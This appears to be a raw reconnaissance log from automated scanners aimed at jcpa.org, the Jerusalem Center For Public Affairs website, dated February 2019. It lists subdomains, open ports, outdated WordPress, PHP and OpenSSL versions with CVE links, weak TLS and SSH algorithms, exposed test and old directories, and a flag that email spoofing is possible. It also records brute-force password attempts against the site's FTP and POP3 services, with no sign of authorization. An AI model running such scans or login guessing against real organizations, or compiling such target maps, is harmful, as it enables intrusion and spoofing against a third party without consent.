- mail.jcpa.org
- mail.jcpa.org
- msoid.jcpa.org
- old.jcpa.org
- webmail.jcpa.org
- www.dailyalert.jcpa.org
- www.jcpa.org
- www.jcpa.org
- www.jerusalem.jcpa.org
- www.www.jcpa.org
- #######################################################################################################################################
- [*] Found SPF record:
- [*] v=spf1 include:spf.protection.outlook.com -all
- [*] SPF record contains an All item: -all
- [*] No DMARC record found. Looking for organizational record
- [+] No organizational DMARC record
- [+] Spoofing possible for jcpa.org!
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 11:16 EST
- Nmap scan report for jcpa.org (198.57.177.19)
- Host is up (0.15s latency).
- rDNS record for 198.57.177.19: 198-57-177-19.unifiedlayer.com
- Not shown: 343 closed ports, 123 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 11:16 EST
- Nmap scan report for jcpa.org (198.57.177.19)
- Host is up (0.073s latency).
- rDNS record for 198.57.177.19: 198-57-177-19.unifiedlayer.com
- Not shown: 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 11:16 EST
- Nmap scan report for jcpa.org (198.57.177.19)
- Host is up (0.14s latency).
- rDNS record for 198.57.177.19: 198-57-177-19.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 4671 guesses in 185 seconds, average tps: 25.5
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.32 (92%), Linux 2.6.32 - 3.1 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 3.5 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 14 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 61.17 ms 10.235.200.1
- 2 61.63 ms 193.37.252.209
- 3 74.75 ms vlan2905.bb1.mia1.us.m247.com (82.102.29.174)
- 4 61.22 ms 140.174.28.21
- 5 126.45 ms ae-5.r04.miamfl02.us.bb.gin.ntt.net (129.250.3.209)
- 6 61.62 ms ae-0.r21.miamfl02.us.bb.gin.ntt.net (129.250.4.20)
- 7 92.64 ms 129.250.2.219
- 8 117.46 ms ae-5.r22.lsanca07.us.bb.gin.ntt.net (129.250.7.69)
- 9 118.64 ms ae-1.r00.lsanca07.us.bb.gin.ntt.net (129.250.3.17)
- 10 127.88 ms ae-1.a01.lsanca07.us.bb.gin.ntt.net (129.250.2.160)
- 11 138.28 ms ae-0.endurance.lsanca07.us.bb.gin.ntt.net (129.250.198.182)
- 12 157.09 ms eth3-33-1.prvspn002.net.unifiedlayer.com (162.144.240.155)
- 13 137.28 ms po97.prv-leaf3a.net.unifiedlayer.com (162.144.240.43)
- 14 141.27 ms 198-57-177-19.unifiedlayer.com (198.57.177.19)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 11:20 EST
- Nmap scan report for jcpa.org (198.57.177.19)
- Host is up (0.15s latency).
- rDNS record for 198.57.177.19: 198-57-177-19.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 53/tcp open domain ISC BIND
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.32 (92%), Linux 2.6.32 - 3.1 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.5 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 14 hops
- Host script results:
- | dns-blacklist:
- | SPAM
- |_ l2.apews.org - SPAM
- | dns-brute:
- | DNS Brute-force hostnames:
- | mail.jcpa.org - 195.225.46.79
- |_ www.jcpa.org - 198.57.177.19
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 61.39 ms 10.235.200.1
- 2 61.99 ms 193.37.252.209
- 3 63.86 ms vlan2905.bb1.mia1.us.m247.com (82.102.29.174)
- 4 62.44 ms 140.174.28.21
- 5 127.05 ms ae-5.r04.miamfl02.us.bb.gin.ntt.net (129.250.3.209)
- 6 62.43 ms ae-0.r21.miamfl02.us.bb.gin.ntt.net (129.250.4.20)
- 7 91.52 ms 129.250.2.219
- 8 119.46 ms ae-5.r22.lsanca07.us.bb.gin.ntt.net (129.250.7.69)
- 9 121.67 ms ae-1.r00.lsanca07.us.bb.gin.ntt.net (129.250.3.17)
- 10 149.49 ms ae-1.a01.lsanca07.us.bb.gin.ntt.net (129.250.2.160)
- 11 137.91 ms ae-0.endurance.lsanca07.us.bb.gin.ntt.net (129.250.198.182)
- 12 164.09 ms eth3-33-1.prvspn002.net.unifiedlayer.com (162.144.240.155)
- 13 134.02 ms po99.prv-leaf3b.net.unifiedlayer.com (162.144.240.55)
- 14 143.28 ms 198-57-177-19.unifiedlayer.com (198.57.177.19)
- #######################################################################################################################################
- http://jcpa.org [200 OK] Apache[2.4.38][mod_bwlimited/1.4], Country[UNITED STATES][US], Email[info@jcpa.org], Frame, Google-Analytics[Universal][UA-39298142-1,UA-39298142-2], HTML5, HTTPServer[Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4], IP[198.57.177.19], JQuery[1.12.4], Open-Graph-Protocol[website], OpenSSL[1.0.2q], Script[application/ld+json,text/javascript], ShareThis, Title[Jerusalem Center For Public Affairs], WordPress, WordpressSuperCache, YouTube
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://jcpa.org...
- ___________________________________________________ SITE INFO ____________________________________________________
- IP Title
- 198.57.177.19 Jerusalem Center For Public Affairs
- ____________________________________________________ VERSION _____________________________________________________
- Name Versions Type
- WordPress 3.8 | 3.8.1 | 3.8.2 | 3.8.3 | 3.8.4 | 3.8.5 | 3.8.6 | 3.8.7 CMS
- 3.8.8 | 3.9 | 3.9.1 | 3.9.2 | 3.9.3 | 3.9.4 | 3.9.5 | 3.9.6
- 4.0 | 4.0.1 | 4.0.2 | 4.0.3 | 4.0.4 | 4.0.5 | 4.1 | 4.1.1
- 4.1.2 | 4.1.3 | 4.1.4 | 4.1.5 | 4.2 | 4.2.1 | 4.2.2
- Apache 2.4.38 Platform
- PHP 5.6.40 Platform
- mod_bwlimited 1.4 Platform
- openssl 1.0.2q Platform
- __________________________________________________ INTERESTING ___________________________________________________
- URL Note Type
- /robots.txt robots.txt index Interesting
- /test.php Test file Interesting
- /test.htm Test file Interesting
- /test/ Test directory Interesting
- /old/ This might be interesting Interesting
- _____________________________________________________ TOOLS ______________________________________________________
- Name Link Software
- wpscan https://github.com/wpscanteam/wpscan WordPress
- CMSmap https://github.com/Dionach/CMSmap WordPress
- ________________________________________________ VULNERABILITIES _________________________________________________
- Affected #Vulns Link
- WordPress 3.8 12 http://cvedetails.com/version/162922
- WordPress 3.8.1 12 http://cvedetails.com/version/162923
- WordPress 3.8.2 7 http://cvedetails.com/version/176067
- WordPress 3.8.3 7 http://cvedetails.com/version/176068
- WordPress 3.8.4 8 http://cvedetails.com/version/176069
- WordPress 3.9 8 http://cvedetails.com/version/176070
- WordPress 3.9.1 15 http://cvedetails.com/version/169908
- WordPress 3.9.2 10 http://cvedetails.com/version/176071
- WordPress 3.9.3 1 http://cvedetails.com/version/185080
- WordPress 4.0 9 http://cvedetails.com/version/176072
- WordPress 4.0.1 1 http://cvedetails.com/version/185081
- WordPress 4.1 1 http://cvedetails.com/version/185082
- WordPress 4.1.1 2 http://cvedetails.com/version/185079
- WordPress 4.2 1 http://cvedetails.com/version/185048
- WordPress 4.2.1 1 http://cvedetails.com/version/184019
- WordPress 4.2.2 2 http://cvedetails.com/version/185073
- __________________________________________________________________________________________________________________
- Time: 60.3 sec Urls: 472 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Wed, 06 Feb 2019 16:22:48 GMT
- Server: Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4
- Vary: Accept-Encoding,Cookie
- Last-Modified: Wed, 06 Feb 2019 16:16:16 GMT
- ETag: "1f3b5-5813c0b9b64e9"
- Accept-Ranges: bytes
- Content-Length: 127925
- Cache-Control: max-age=3, must-revalidate
- Expires: Wed, 06 Feb 2019 16:22:51 GMT
- Content-Type: text/html; charset=UTF-8
- HTTP/1.1 200 OK
- Date: Wed, 06 Feb 2019 16:22:49 GMT
- Server: Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4
- Vary: Accept-Encoding,Cookie
- Last-Modified: Wed, 06 Feb 2019 16:16:16 GMT
- ETag: "1f3b5-5813c0b9b64e9"
- Accept-Ranges: bytes
- Content-Length: 127925
- Cache-Control: max-age=3, must-revalidate
- Expires: Wed, 06 Feb 2019 16:22:52 GMT
- Content-Type: text/html; charset=UTF-8
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 11:23 EST
- Nmap scan report for jcpa.org (198.57.177.19)
- Host is up (0.14s latency).
- rDNS record for 198.57.177.19: 198-57-177-19.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 51 guesses in 40 seconds, average tps: 1.3
- |_ ERROR: Failed to connect.
- |_pop3-capabilities: TOP UIDL STLS RESP-CODES PIPELINING AUTH-RESP-CODE SASL(PLAIN LOGIN) CAPA USER
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.32 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 - 3.1 (90%), Linux 3.11 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 14 hops
- TRACEROUTE (using port 110/tcp)
- HOP RTT ADDRESS
- 1 61.49 ms 10.235.200.1
- 2 61.83 ms 193.37.252.209
- 3 61.55 ms vlan2905.bb1.mia1.us.m247.com (82.102.29.174)
- 4 61.55 ms ae-41.a01.miamfl02.us.bb.gin.ntt.net (140.174.28.21)
- 5 126.76 ms ae-5.r04.miamfl02.us.bb.gin.ntt.net (129.250.3.209)
- 6 63.92 ms ae-1.r21.miamfl02.us.bb.gin.ntt.net (129.250.4.88)
- 7 90.94 ms 129.250.2.219
- 8 120.33 ms ae-5.r22.lsanca07.us.bb.gin.ntt.net (129.250.7.69)
- 9 119.36 ms ae-1.r00.lsanca07.us.bb.gin.ntt.net (129.250.3.17)
- 10 119.38 ms ae-1.a01.lsanca07.us.bb.gin.ntt.net (129.250.2.160)
- 11 141.73 ms ae-0.endurance.lsanca07.us.bb.gin.ntt.net (129.250.198.182)
- 12 157.92 ms eth3-33-1.prvspn002.net.unifiedlayer.com (162.144.240.155)
- 13 134.12 ms 162.144.240.55
- 14 134.13 ms 198-57-177-19.unifiedlayer.com (198.57.177.19)
- #######################################################################################################################################
- https://jcpa.org [200 OK] Apache[2.4.38][mod_bwlimited/1.4], Country[UNITED STATES][US], Email[info@jcpa.org], Frame, Google-Analytics[Universal][UA-39298142-1,UA-39298142-2], HTML5, HTTPServer[Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4], IP[198.57.177.19], JQuery[1.12.4], Open-Graph-Protocol[website], OpenSSL[1.0.2q], Script[application/ld+json,text/javascript], ShareThis, Title[Jerusalem Center For Public Affairs], WordPress, WordpressSuperCache, YouTube
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning https://jcpa.org...
- ___________________________________________________ SITE INFO ____________________________________________________
- IP Title
- 198.57.177.19 Jerusalem Center For Public Affairs
- ____________________________________________________ VERSION _____________________________________________________
- Name Versions Type
- WordPress 3.8 | 3.8.1 | 3.8.2 | 3.8.3 | 3.8.4 | 3.8.5 | 3.8.6 | 3.8.7 CMS
- 3.8.8 | 3.9 | 3.9.1 | 3.9.2 | 3.9.3 | 3.9.4 | 3.9.5 | 3.9.6
- 4.0 | 4.0.1 | 4.0.2 | 4.0.3 | 4.0.4 | 4.0.5 | 4.1 | 4.1.1
- 4.1.2 | 4.1.3 | 4.1.4 | 4.1.5 | 4.2 | 4.2.1 | 4.2.2
- Apache 2.4.38 Platform
- PHP 5.6.40 Platform
- mod_bwlimited 1.4 Platform
- openssl 1.0.2q Platform
- __________________________________________________ INTERESTING ___________________________________________________
- URL Note Type
- /install.php Installation file Interesting
- /robots.txt robots.txt index Interesting
- /test.htm Test file Interesting
- /test/ Test directory Interesting
- /old/ This might be interesting Interesting
- _____________________________________________________ TOOLS ______________________________________________________
- Name Link Software
- wpscan https://github.com/wpscanteam/wpscan WordPress
- CMSmap https://github.com/Dionach/CMSmap WordPress
- ________________________________________________ VULNERABILITIES _________________________________________________
- Affected #Vulns Link
- WordPress 3.8 12 http://cvedetails.com/version/162922
- WordPress 3.8.1 12 http://cvedetails.com/version/162923
- WordPress 3.8.2 7 http://cvedetails.com/version/176067
- WordPress 3.8.3 7 http://cvedetails.com/version/176068
- WordPress 3.8.4 8 http://cvedetails.com/version/176069
- WordPress 3.9 8 http://cvedetails.com/version/176070
- WordPress 3.9.1 15 http://cvedetails.com/version/169908
- WordPress 3.9.2 10 http://cvedetails.com/version/176071
- WordPress 3.9.3 1 http://cvedetails.com/version/185080
- WordPress 4.0 9 http://cvedetails.com/version/176072
- WordPress 4.0.1 1 http://cvedetails.com/version/185081
- WordPress 4.1 1 http://cvedetails.com/version/185082
- WordPress 4.1.1 2 http://cvedetails.com/version/185079
- WordPress 4.2 1 http://cvedetails.com/version/185048
- WordPress 4.2.1 1 http://cvedetails.com/version/184019
- WordPress 4.2.2 2 http://cvedetails.com/version/185073
- __________________________________________________________________________________________________________________
- Time: 77.0 sec Urls: 467 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Wed, 06 Feb 2019 16:26:23 GMT
- Server: Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4
- Vary: Accept-Encoding,Cookie
- Last-Modified: Tue, 05 Feb 2019 11:25:20 GMT
- ETag: "1f586-58123dd4c417f"
- Accept-Ranges: bytes
- Content-Length: 128390
- Cache-Control: max-age=3, must-revalidate
- Expires: Wed, 06 Feb 2019 16:26:26 GMT
- Content-Type: text/html; charset=UTF-8
- HTTP/1.1 200 OK
- Date: Wed, 06 Feb 2019 16:26:24 GMT
- Server: Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4
- Vary: Accept-Encoding,Cookie
- Last-Modified: Tue, 05 Feb 2019 11:25:20 GMT
- ETag: "1f586-58123dd4c417f"
- Accept-Ranges: bytes
- Content-Length: 128390
- Cache-Control: max-age=3, must-revalidate
- Expires: Wed, 06 Feb 2019 16:26:27 GMT
- Content-Type: text/html; charset=UTF-8
- #######################################################################################################################################
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 198.57.177.19
- Testing SSL server jcpa.org on port 443 using SNI name jcpa.org
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-SEED-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 128 bits SEED-SHA
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Accepted TLSv1.2 128 bits IDEA-CBC-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits RC4-SHA
- Accepted TLSv1.2 128 bits RC4-MD5
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits DHE-RSA-SEED-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 128 bits SEED-SHA
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Accepted TLSv1.1 128 bits IDEA-CBC-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits RC4-SHA
- Accepted TLSv1.1 128 bits RC4-MD5
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits DHE-RSA-SEED-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 128 bits SEED-SHA
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- Accepted TLSv1.0 128 bits IDEA-CBC-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits RC4-SHA
- Accepted TLSv1.0 128 bits RC4-MD5
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: jcpa.org
- Altnames: DNS:jcpa.org, DNS:www.jcpa.org
- Issuer: Let's Encrypt Authority X3
- Not valid before: Jan 26 09:53:14 2019 GMT
- Not valid after: Apr 26 09:53:14 2019 GMT
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 11:54 EST
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up (0.26s latency).
- Not shown: 342 closed ports, 123 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 11:54 EST
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up (0.14s latency).
- Not shown: 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 11:54 EST
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up (0.26s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 3222 guesses in 188 seconds, average tps: 17.6
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|firewall|storage-misc
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 3.10 (89%), Linux 3.4 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 19 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 123.51 ms 10.246.200.1
- 2 123.54 ms 190.124.251.129
- 3 123.57 ms 172.16.21.1
- 4 183.76 ms ip4-91-205-233-128.rdns.racklodge.com (91.205.233.128)
- 5 183.73 ms 192.168.7.2
- 6 183.76 ms edge2.xe0-0-14.globalmarket-4.mia007.pnap.net (63.251.152.229)
- 7 184.02 ms core3.t6-2.bbnet2.mia003.pnap.net (69.25.0.67)
- 8 184.01 ms te0-3-0-14.ccr21.mia03.atlas.cogentco.com (38.88.164.137)
- 9 184.00 ms xo.mia03.atlas.cogentco.com (154.54.11.70)
- 10 258.46 ms vb2000d2.rar3.sanjose-ca.us.xo.net (207.88.13.102)
- 11 257.28 ms 207.88.12.224.ptr.us.xo.net (207.88.12.224)
- 12 256.83 ms 207.88.12.195.ptr.us.xo.net (207.88.12.195)
- 13 258.69 ms 207.88.12.188
- 14 256.71 ms 207.88.12.191.ptr.us.xo.net (207.88.12.191)
- 15 256.64 ms 216.156.16.25
- 16 257.70 ms 216-50-157-238.dal-10.cvx.algx.net (216.50.157.238)
- 17 267.81 ms eth4-33-1.prvspn001.net.unifiedlayer.com (162.144.240.141)
- 18 257.64 ms po97.prv-leaf3b.net.unifiedlayer.com (162.144.240.51)
- 19 262.83 ms 198-57-177-19.unifiedlayer.com (198.57.177.19)
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
